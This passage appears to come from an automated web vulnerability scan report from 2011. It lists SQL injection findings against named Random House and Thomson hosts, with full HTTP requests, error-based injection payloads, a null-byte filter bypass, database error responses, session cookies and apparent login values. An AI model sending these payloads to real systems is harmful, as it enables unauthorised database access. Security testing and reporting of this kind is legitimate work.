User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:31:57 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.2. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=%27%20and%20row%281%2C1%29%3E%28select%20count%28*%29%2Cconcat%28CONCAT%28CHAR%2895%29%2CCHAR%2833%29%2CCHAR%2864%29%2CCHAR%2852%29%2CCHAR%28100%29%2CCHAR%28105%29%2CCHAR%28108%29%2CCHAR%28101%29%2CCHAR%28109%29%2CCHAR%28109%29%2CCHAR%2897%29%29%2C0x3a%2Cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%20or%20%271%27%3D%27&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:29:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 451
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7481922958044
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=%27%20and%20row%281%2C1%29%3E%28select%20count%28*%29%2Cconcat%28CONCAT%28CHAR%2895%29%2CCHAR%2833%29%2CCHAR%2864%29%2CCHAR%2852%29%2CCHAR%28100%29%2CCHAR%28105%29%2CCHAR%28108%29%2CCHAR%28101%29%2CCHAR%28109%29%2CCHAR%28109%29%2CCHAR%2897%29%29%2C0x3a%2Cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%20or%20%271%27%3D%27&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:29:43 GMT
Server: Omniture DC/2.0.0
xserver: www440
Content-Length: 0
Content-Type: text/html


1.3. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79384069200516 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s79384069200516

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /b/ss/ranhcorporate,ranhrollup/1%00'/H.17/s79384069200516?AQB=1&ndh=1&t=26/3/2011%2017%3A7%3A42%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=146&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:13:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 429
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ranhcorporate,ranhrollup/1 was not found on thi
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ranhcorporate,ranhrollup/1%00''/H.17/s79384069200516?AQB=1&ndh=1&t=26/3/2011%2017%3A7%3A42%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=146&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:13:47 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.4. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s75506922125350 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhrollup/1/H.22.1/s75506922125350

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhrollup/1/H.22.1/s75506922125350?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A25%202%20300&ns=randomhouse&pageName=about%3Acontact.html%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about&events=event8&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2F&v25=www.randomhouse.com%2Fabout%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=%5B%5BB%5D%5D; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:57:40 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s75506922125350 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhrollup/1/H.22.1/s75506922125350?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A25%202%20300&ns=randomhouse&pageName=about%3Acontact.html%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about&events=event8&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2F&v25=www.randomhouse.com%2Fabout%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=%5B%5BB%5D%5D; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:57:40 GMT
Server: Omniture DC/2.0.0
xserver: www287
Content-Length: 0
Content-Type: text/html


1.5. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s79787087680306 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhrollup/1/H.22.1/s79787087680306

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhrollup/1/H.22.1/s79787087680306?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A47%202%20300&ns=randomhouse&pageName=about%3Afaq%3Aindex.php%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&r=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about%2Ffaq&events=event8&c17=about%3Acontact.html%3A%3A&c18=e-mail%20Customer%20Service&c19=about%3Acontact.html%3A%3A%20%7C%20e-mail%20Customer%20Service&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2Ffaq%2F&v25=www.randomhouse.com%2Fabout%2Ffaq%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=about%3Acontact.html%3A%3A&pidt=1&oid=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&ot=A&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/faq/index.php?ToDo=contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=ranhrollup%3D%2526pid%253Dabout%25253Acontact.html%25253A%25253A%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.randomhouse.com%25252Fabout%25252Ffaq%25252Findex.php%25253FToDo%25253Dcontact%2526ot%253DA; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 23:02:14 GMT
Server: Omniture DC/2.0.0
Content-Length: 439
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhrollup/1/H.22.1/s79787087680306 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhrollup/1/H.22.1/s79787087680306?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A19%3A47%202%20300&ns=randomhouse&pageName=about%3Afaq%3Aindex.php%3A%3A&g=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&r=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Fcontact.html&cc=USD&ch=about%2Ffaq&events=event8&c17=about%3Acontact.html%3A%3A&c18=e-mail%20Customer%20Service&c19=about%3Acontact.html%3A%3A%20%7C%20e-mail%20Customer%20Service&c24=www.randomhouse.com%2Fabout%2F&v24=www.randomhouse.com%2Fabout%2F&c25=www.randomhouse.com%2Fabout%2Ffaq%2F&v25=www.randomhouse.com%2Fabout%2Ffaq%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=about%3Acontact.html%3A%3A&pidt=1&oid=http%3A%2F%2Fwww.randomhouse.com%2Fabout%2Ffaq%2Findex.php%3FToDo%3Dcontact&ot=A&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/faq/index.php?ToDo=contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; s_sq=ranhrollup%3D%2526pid%253Dabout%25253Acontact.html%25253A%25253A%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.randomhouse.com%25252Fabout%25252Ffaq%25252Findex.php%25253FToDo%25253Dcontact%2526ot%253DA; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 23:02:13 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.6. http://kbportal.thomson.com/ [PW parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The PW parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the PW parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO%00' HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:47:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.7. http://kbportal.thomson.com/ [UN parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The UN parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the UN parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO%00'&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.8. http://kbportal.thomson.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21%00'&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:44:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6551

<html>
<head>
<title>ERROR [42S22] [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Lan_code'.</title>
<style>
   body {font-family:"Verdana";font-weig
...[SNIP]...

1.9. http://kbportal.thomson.com/ [cpc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70%00'&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
